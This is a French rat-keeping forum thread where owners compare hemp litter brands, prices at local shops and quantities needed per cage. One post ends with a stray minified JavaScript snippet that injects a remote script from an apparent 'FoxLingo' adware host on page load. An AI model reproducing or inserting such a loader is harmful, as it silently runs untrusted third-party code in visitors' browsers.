Aller au contenu
Rechercher dans
  • Plus d’options…
Rechercher les résultats qui contiennent…
Rechercher les résultats dans…
Lulululu

Litières

Messages recommandés

Marchi à vous 3 pour les réponses Smile

Je retiens Jardiland car j'en ai un près de chez moi et j'ai jamais mis les pieds je crois bien.

Je vais voir aussi les autres adresses que vous m'avez donné cheers


Sinon j'ai vu un petit concours photo pour les rats sur le forum ... ça tombe bien, je me passionne de plus en plus pour la photo et comme j'apprends des tours à Nirvana, cela va me faciliter la chose.

Je dois me faire un site perso pour les photos mais je n'ai pas le temps ces temps-ci.
En attendant, vous pouvez voir ce que je fais ici :

Adresse Web :
http://www.virusphoto.com/search.php?searchid=1548188

king

Partager ce message


Lien à poster
Partager sur d’autres sites
Finalement j'ai trouvé de la Chambiose à la serre près de chez moi (racheté par gamme vert récemment) ... 9 € et de brouettes pour 30l.

Partager ce message


Lien à poster
Partager sur d’autres sites

Finalement j'ai aussi trouvé de la chambiose à la serre de Billy Montigny/Fouquières lez lens.

7,50 € les 30 litres.

Un peu moins de 20 € les 100 litres.

cheers

Partager ce message


Lien à poster
Partager sur d’autres sites
FRANCKYIV a écrit:
'alut les filles ... Very Happy

(Si jamais un mec me fait une première réponse ... je fais payter le champagne ! )



Mec....et trentenaire en plus, ça marche quand c'est ça ? vas-y fais péter Smile

Partager ce message


Lien à poster
Partager sur d’autres sites
bacozzz a écrit:
FRANCKYIV a écrit:
'alut les filles ... Very Happy

(Si jamais un mec me fait une première réponse ... je fais payter le champagne ! )



Mec....et trentenaire en plus, ça marche quand c'est ça ? vas-y fais péter Smile


Nop ça marchait si tu répondais en premier ... c'est con hein ... lol!

Partager ce message


Lien à poster
Partager sur d’autres sites

'alut les filles !!! (et les quelques mecs ... désolé [b]bacozzz [/b]comme je sais que tu peux recevoir une notification par email y a plus de champagne ...
)

Juste pour dire que j'ai trouvé de la Chambiose en 100 litres pour 18€ à AnimZoo (boutique physique dans la zone de Noyelles-Godault dans le pas-de-calais).

Pour l'instant j'ai pas trouvé moins cher !



!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="http://edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

Partager ce message


Lien à poster
Partager sur d’autres sites
j'utilise de la litière minérale à la marque Paradisio chez Truffault, est ce conseillé ?

Partager ce message


Lien à poster
Partager sur d’autres sites
je connais pas, mais en général, les litières minérales sont assez poussièreuses, et pas terriblement absorbantes ni confortables.

Partager ce message


Lien à poster
Partager sur d’autres sites
Je dois normalement accueillir mes premiers ratons samedi prochain, j'ai fais ce soir une animalerie et une jardinerie pour voir ce que je pouvais trouver en litière près de chez moi.

En animalerie ils n'avaient que du chanvre tout poussiéreux, j'ai dis non merci...

En jardinerie, ils avaient de la chambiose, qui est apparemment composée uniquement de chanvre, et elle est très belle, pas poussiéreuse du tout. La seule question que je me pose c'est au niveau du prix : 19,90 € les 100 L. Raisonnable ? Par ailleurs j'ai du mal à me rendre compte de combien de litres je vais avoir besoin, et à quelle fréquence ? Avec les 100 L je peux tenir un mois ? (j'ai une Furet XL)

Partager ce message


Lien à poster
Partager sur d’autres sites
de mémoire, je mettais 10litres de chanvre dans le fond de la XL, maintenant avec un sac plus grand que 10l tu risque d'en mettre plus, mais tu devrais en avoir pour 8/9 fois je pense

Partager ce message


Lien à poster
Partager sur d’autres sites
On peut trouver des des sacs de 20 kilos de chanvre pour moins de 13 euros, mais suivant ce que l'on peut trouver 19 euros c'est pas si mal. Tu veux pas juste mettre la litière dans des bacs ou autre?

Si tu vois qu'ils sont propres tes futurs loulous, ça peut te permettre de faire durer plus longtemps ton chanvre.

Partager ce message


Lien à poster
Partager sur d’autres sites
Caro a écrit:
On peut trouver des des sacs de 20 kilos de chanvre pour moins de 13 euros, mais suivant ce que l'on peut trouver 19 euros c'est pas si mal. Tu veux pas juste mettre la litière dans des bacs ou autre?

Si tu vois qu'ils sont propres tes futurs loulous, ça peut te permettre de faire durer plus longtemps ton chanvre.


Je ne sais pas, je me dis que c'est quand même mieux pour leurs petites pattes que le plastique Smile

Partager ce message


Lien à poster
Partager sur d’autres sites
Bonjour à toutes et à tous,

ça serait p-ê intéressant de faire une photo comparative des volumes ou des poids par rapport à une bouteille d'eau de 1,5 litre par exemple, histoire de se rendre compte au premier regard ...

Amicalement vôtre

Partager ce message


Lien à poster
Partager sur d’autres sites
perso je ne connais que la litière de chanvre donc je ne sais pas trop pour le drybed, il parait que c'est bien aussi...

faire un comparatif en bouteille d'eau je sais pas si cela servirait à grand chose, la contenance des litières est déjà indiquée en litres

perso j'avais trouvé le plus avantageux sur le net, livraison offerte en en achetant beaucoup, sur zooplus je crois

Partager ce message


Lien à poster
Partager sur d’autres sites
merci, intéressant en effet, ça remonte à 2010, au début du drybed, mais j'avoue j'ai pas lu tout le topic^^

j'ai pas de rats en ce moment

Partager ce message


Lien à poster
Partager sur d’autres sites
Bonjour, je mets du chanvre à mes rattes. J'ai vu des cages où les gens ne mettaient pas de litiere et ramassaient les crottes et pipi tous  les jours. Est ce bon pour les ratoux ? (confort sous les pates, hygiene, etc...)

Merci

Partager ce message


Lien à poster
Partager sur d’autres sites
pas terrible pour l'hygiène!

si le rat trempe sa queue dans le pipi par exemple!

on peut ramasser le caca tous les jours avec le drybed mais il faut quelque chose qui absorbe l'urine qd même!

à moins d'être 24h/24 à surveiller ses rats?

Partager ce message


Lien à poster
Partager sur d’autres sites

×
×
  • Créer...